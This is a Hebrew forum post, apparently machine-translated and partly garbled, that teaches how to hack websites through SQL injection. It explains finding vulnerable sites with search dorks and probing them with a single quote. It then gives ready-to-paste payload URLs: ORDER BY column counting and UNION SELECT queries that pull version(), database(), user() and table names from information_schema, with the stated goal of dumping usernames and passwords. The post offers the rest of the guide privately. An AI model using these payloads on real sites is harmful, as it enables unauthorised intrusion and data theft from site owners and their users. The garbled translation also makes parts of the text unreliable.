אחרי תקופה ארוכה שזה ההדרכה הראשונה שלי על פריצה באתר באמצעות
מתקפת הזרקת SQL בצעדים קלים ופשוטים.
ראיתי אנשים של רבים שהם לא יכולים להבין את שיטת הזרקת SQL, כי זה באמת מאוד קשה להבין ולהחדיר קוד זדוני לכתובת אתר ומקבל מסד נתונים באתר, אז הנה אני יצרתי הדרכה הזרקת SQL עם צעדים פשוטים ומובן, מקווה שכולכם יאהב את זה .
✔ מה היא הזרקת SQL?
הזרקת SQL היא אחד vulneraility יישום האינטרנט הנפוץ שמאפשר לתוקף להזריק פקודת SQL זדונית באמצעות פרמטר או כל תיבת קלט שמחוברת למאגר מידע באתר. בהזרקת SQL תוקף מוצא vulnerablility (SQLi) ולהחדיר קוד זדוני באמצעות טכניקות שונות ולפרוץ מסד נתונים באתר זה נקרא התקפת SQL Injection ניצול DB (מסד נתונים) וגם ניצול פגיעות הזרקת SQL. באמצעות שיטת התקפת הזרקת SQL תוקף יכול לקבל מלא DB של אתר אינטרנט - ניתן התפוצצו מזהה משתמש וסיסמא, תוקף יכול גם כבה את שרת SQL שלי.
תוקף יכול לשנות את התוכן של אתר האינטרנט של התחברות ועוקפת.
✔ דרישות: -
1.
מצא את האתר פגיע.
בינג או יאהו מנוע חיפוש לחיפוש אתרים פגיעים הזרקת SQL באמצעות יורמים. יורמים עם הפרמטר ה-URL.
הנה, להדרכה יש לי כבר אתר אחד פגיע (אבל אני לא יכול לחשוף את שמו של) בתוצאה זה תוכל למצוא אלפי אתרי אינטרנט.הדבר הנפוץ בתוצאות החיפוש הזה הוא כל כתובת אתר האינטרנט שיש בסוג זה של קוד בזה inurl הסוף:? id = index.php
כן, בהחלט יש את זה כי זה כל האתר שיש SQL פרמטר לכתובת האתר שלהם. אז פשוט גוגל חיפשה את זה.
עבור למשל. Www.targetwebsite.com/index.php?id=8
✔ מצא SQLi פגיעויות
- לפתוח את כל כתובת אתר אינטרנט שבו יש SQL פרמטר. כמו יורמים
- שים ציטוט אחד בסוף של כתובת אתר האינטרנט (')
- לדוגמה:. Www.targetwebsite.com/index.php?id=2 '
- אם הדף נשאר זהה או לא מצאו אז זה לא פגיע ואם הדף מציג כל סוג של שגיאה הקשורות ל-SQL מחרוזת או שגיאת MySQL אז האתר הוא פגיע SQLi. עבור למשל. יש לי את השגיאה הזאת.:
אירעה שגיאה ... יש לך שגיאה בתחביר SQL שלך;? לבדוק את המדריך המתאים לגרסת שרת MySQL שלך עבור תחביר הזכות להשתמש ליד'' /
contentPage.php id = 8'' 'בשורת 1
- משמעות הדבר היא האתר פגיע להזרקת SQL. * חופשי על הבר *
- Yehfii! מצאנו אתר פגיע הזרקת SQL עכשיו זה זמן למצוא לא. עמודות קיימות במסד הנתונים.
- כדי לעשות את זה להחליף את זה ציטוט אחד בודד (') עם "סדר לפי לא". הצהרה עד שתמצאו את הודעת השגיאה. שינוי לא.מ1,2,3,4,5,6,7,8,9, ..... עד שאתה מקבל הודעת שגיאה כמו "טור לא ידוע"
- לדוגמא: - שינוי זה סדר לפי 1,2,3,4 כמו להלן דוגמא: -
www.targetwebsite.com/index.php?id=8 Order by 1
www.targetwebsite.com/index.php?id=8 Order by 2
www.targetwebsite.com/index.php?id=8 Order by 3
- ונניח מעל השיטה לא עובד ולאחר מכן להשתמש בהמשך השיטה.
www.targetwebsite.com/index.php?id=8 order by 1--
www.targetwebsite.com/index.php?id=8 order by 2--
www.targetwebsite.com/index.php?id=8 order by 3--
אם אתה מקבל שגיאה על סדר לפי 9 שאומר שיש לי DB 8 מספר עמודות ואם u מצא שגיאה על סדר לפי 6 אז יש לי DB 5 מספר עמודות. אני מתכוון, אם אתה מכניס סדר לפי 12 ונניח שיש לי DB רק 11 לא. של עמודות ולאחר מכן אתר יציג שגיאה ככה:. אירעה שגיאה בטור ידוע '12 'ב' סעיף סדר '.
# הטריק הזה משמש למעשה כדי למצוא את מספר עמודות בDB. להבין את הדוגמא הבאה ואתה Wil להכיר.
www.targetwebsite.com/index.php?id=8 Order by 1 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 2 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 3 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 4 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 5 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 6 (Error)
.........................Try Until you get an Error..........................כאן, באתר פגיע שלי הראה שגיאה על סדר לפי 12 שאומר שיש לי באתר פגיע 11 מספר עמודות בזה DB אז עכשיו כאן מצאתי את מספר העמודות בDB שלי: -.
מספר עמודות = 11
מצא את הטור פגיע.
- בעיקרון אם האתר פגיע ואז יש לו פגיעות בטורו של ועכשיו זה זמן לגלות עמודה זו. ובכן יש לנו גילינו בהצלחה מספר העמודות קיימות במסד נתונים. תן לנו למצוא את טור פגיע באמצעות השאילתה "columns_sequence איחוד בחר". וגם לשנות את הערך מזהה לשלילי, אני מתכוון נניח שיש באתר index.php זו כתובת האתר? Id = 8 לשנות אותו לindex.php? Id = -8. סימן פשוט לשים מינוס "-" לפני זיהוי.
- עבור למשל. אם מספר העמודות הוא 11 אז השאילתה היא כדלקמן: -
www.targetwebsite.com/index.php?id=-8 union select 1,2,3,4,5,6,7,8,9,10,11--
- ונניח מעל השיטה לא יעבוד ולאחר מכן להשתמש בהמשך שיטה: -
www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11--
- ורגע, אם השאילתה בוצעה לאחר מכן הוא יציג את מספר העמודה.
בתוצאה מעל, מצאתי שלוש עמודות פגיעות 2,3 ו -4. בואו לקחת 2 כהדרכה שלנו
טוב! מצאנו עמודות פגיעות, עכשיו שלב הבא.-
מציאת גרסה, מסד נתונים ומשתמש.
עכשיו זה זמן שיש לנו כדי לגלות גרסת אתר מסד הנתונים, משתמש, שם מסד נתונים וכמה פרטים אחרים, פשוט להחליף טור פגיע לא.
עם "version()"
עבור למשל.
www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--
ועכשיו הקש על Enter: ואתה תקבל את תוצאה.
עכשיו שוב את אותו מחליף עמודה פגיעה בשאילתא שונה כמו: - database()user()
www.targetwebsite.com/index.php?id=-8 union select 1,
version()
,3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8 union select 1,database
(),3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8 union select 1,
user(),3,4,5,6,7,8,9,10,11--
ונניח מעל השיטה לא יעבוד ולאחר מכן להשתמש בהמשך השיטה
www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,
unhex(hex(@@version)),3,4,5,6,7,8,9,10,11--
✔
מציאת שם הטבלה.
- כאן מצאנו טור פגיע, שם DB גרסה ומשתמש הגיעו זמן לקבל את שם טבלה. אם גרסת מסד הנתונים היא 4 ומעלה אז אתה נתת לנחש את שמות הטבלה (התקפת הזרקת SQL העיוורת)
- תנו לנו למצוא את שם החברה טבלה של מסד נתונים, אותו כאן החלפת מספר עמודה פגיעה עם "group_concat (table_name) ומוסיף "מinformation_schema.tables בי table_schema =
database
()"
עבור למשל.
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(table_name)
,3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--
עכשיו על Enter ואתה יכול לראות את טבלה מלאה של מסד נתונים.
.png)
להמשך המדריך נא לפנות אלי בפרטי
איך לפרוץ אתר באמצעות הזרקת SQL עם צעדים קלים
ציטוט ההודעה
